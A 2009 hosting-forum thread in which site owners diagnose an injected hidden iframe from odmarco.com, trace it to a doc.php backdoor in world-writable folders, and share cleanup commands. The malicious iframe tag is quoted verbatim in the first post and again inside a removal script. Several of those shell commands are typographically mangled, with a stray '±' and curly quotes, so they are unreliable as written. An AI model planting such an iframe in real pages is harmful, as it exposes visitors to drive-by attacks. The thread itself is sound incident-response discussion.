Odmarco.com


#1

I went on to some of my sites tonight and found a very odd iframe inserted at the bottom of some of my index.php files:

<iframe src=“http://odmarco.com/tomi/?t=2” width=0 height=0 style=“hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no>

Does anyone know what this is? I haven’t been able to find any real information online and I just submitted it to SiteAdvisor for testing.


#2

Considering that the domain is Russian and was registered yesterday, this can’t be a good thing.

-Scott


#3

I also just got this on quite a few of my sites along with an ifram from google-stat.com


#4

It’s likely a Luckysploit kit.

Which webscripts and plugins are you running on your sites?

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#5

I have sites with vbulletin, game site script, Uploaderv6.1 by celrondude, open-x, gallery 2.2.


#6

I am running on the sites infected, I am running Coppermine, Efiction, Enthusiast, and sundry other small ones like vs.hive and Easy Banner. I’m not running any of the ones Racerxxx is, though.

I can’t think of a script that I run on each of the three domains infected that don’t also run on some or all of my other four domains not infected (my domains are all under different users). I don’t have any script common to just the infected ones. So, it’s really beyond me.


#7

Do you have all of your php files writable? You should make everything read-only(except for directories that need write permissions, like forum avatar and file upload directories.), it’ll stop hacks from writing to your web files, but it won’t stop mysql injection vulnerabilities on some php software.

Some ftp and sftp/scp clients support permission settings on files, like fireftp ftp client(firefox plugin.) and winscp sftp/scp client.


If you are looking for some Dreamhost promo codes you can find some here.


#8

First thing I’d do is test for Conflicker on your PCs.

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#9

I just experienced this on one of my websites, it has been appended to every .html file on the 30th. Including files in directories which are not publicly accessible, so I assume it is internal attack, either the web server is compromised or I have a dodgy script?

I have Invisionboard and PHPFreechat. Ultraboard? Not much else. I have some 664 .html files that are recently modified but seemingly not infected.


#10

I also found one .php with the code appended. The .php file was mostly HTML, I’m not sure why other php files are not affected but it seems very likely that this could have been much worse than it was…

I am on Planters if that matters.


#11

Okay some more info.

I found the file which started it all. doc.php
It was in a 777 directory, although I don’t know why, just because it is 777 does not mean anyone can upload to it… right???

IP address related to it was 24.36.9.246

So just search your logs for the IP on the same date as the .html files were modified. (logs and file dates may not match because your FTP program translates them to your local time… took me a bit…)

Here is the only error log I have which relates to a rather massive file change.

24.36.9.246 - - [30/Mar/2009:23:22:34 -0700] “POST ***/doc.php HTTP/1.1” 200 34686 “-” “libwww-perl/5.805”

Good luck…
I had not selected Enhanced Security on all my sites, god damn I have now!


#12

Php can write to user writable files since it is run in your user and not under a different user like apache, you have to have them set to 444(r–r--r–) for files or 555(r-xr-xr-x) for directories for them not to be writable to php.


If you are looking for some Dreamhost promo codes you can find some here.


#13

I have McAfee on my laptop and Norton on my PC. I just scanned both and neither appear to be inflected. I’ll just go through and secure my sites, change my passwords, and then make sure all files/folders are not at 777.

When I plugged in the code through McAfee, I was told that the code was something like Exploit-Iframe (yeah, not too helpful there) and Backdoor-CUS!PHP. Only, they weren’t on my computer, just on the webpages. Neither my laptop nor my PC were ever infected with either, just the two sample pages I saved and scanned.

I did find a doc.php, too, so I an scanning for those on my websites.


#14

PERL hackers. Get Support to go through all your logfiles and they can block the source.

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#15

I’m not an expert but would it be possible to try a kind of ‘search and replace’ on all files and delete the offending line? Something with ‘grep’? It seems all .html files on all my domains have the infamous iframe injection from odmarco.com.


#16

It depends on the consistency of the injection involved. You could use a streameditor, but you need to be absolutely positive that your matching string doesn’t share a line with anything else or it’ll quickly leave you with broken pages.

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#17

Here’s a way to get rid of them
http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/


#18

I found the source… I think. Some folders that were (for some reason) set at 777. Inside of each of them was a doc.php file that contained the trojan. It seems that it got in that way and infected all index.php files and any file with a .html or .htm extension. I changed my passwords and fixed the permissions to the folders in question and I haven’t seen the problem come back. I do want to find the IP address and block it, too, but that will take some more indepth searching.


#19

It looks like 777 folders are the cause of this exploit. Dreamhost told me to check my installed apps, but I have no similar apps across some of my infected sites, they all had 777 folders though.

Did you guys have ‘Enhanced Security’ selected as well for your User? I didn’t and I am suspecting it could be a compromised user on the same machine, but probably isn’t.

I’m no Unix nerd, but I spent a few days gathering commands to fix this problem. I hope it helps because this stuff is very hard to find. Real world examples of command usage are terribly poor for Unix. ps: I hate unix, freakin ancient legacy command line system with absolutely no consistency in structure and woeful documentation.

To unset all writable folders/files for “Group” and “Public” access. Log into Shell (select Shell access for your user, telnet to yourmachine.dreamhost.com ) and do this,

chmod -R go±w *

That wont change any files unless they had Write allowed for Group or Public and it only unsets the write status.
You can use Putty, or in Windows go to Run and type Telnet. Then type ‘open’ and put in your machine address, foobar.dreamhost.com etc. Type ‘exit’ to quit. it is unix so don’t even try to find help, unix is useless for help docs.

find all files writable by “Public”

find ./ -perm -o=w

find all files writable by “Group”

find ./ -perm -g=w

find total matches of a word in all files

find ./ -name ‘*.html’ 2>/dev/null -print0 | xargs -0 gawk ‘BEGIN{sum1=0;sum=0;}{ sum1+= gsub(/odmarco/,"",$0);sum+=sum1; if(sum1 > 0){ print sum1 FILENAME;} sum1=0}END{print sum }’

find all .php files created between 2 and 6 days ago.

find ./ -name *.php -mtime +1 -mtime -5

Find and replace text in all .html files (you may need to do .htm and .php as well) in current directory and below, which are modified between 2-6 days ago. (If you want to write your own text to be found, put backslashes before all forward slashes and any weird characters. It starts at

find ./ -name ‘*.html’ -mtime +1 -mtime -5 2>/dev/null -print0 | xargs -0 -n1 gawk ‘BEGIN{system(“rm -f “” ARGV[1] “.tmpfix””) }{ rtimes = gsub(/<iframe src=“http://odmarco.com/tomi/?t=2” width=0 height=0 style=“hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>/,"",$0); print $0 >>FILENAME “.tmpfix” }END{if(rtimes > 0){ print rtimes FILENAME;print FILENAME | “cp ““FILENAME”.tmpfix” ““FILENAME”””" | rm ““FILENAME”.tmpfix”"} else { print rtimes | “rm -f ““FILENAME”.tmpfix”” } }’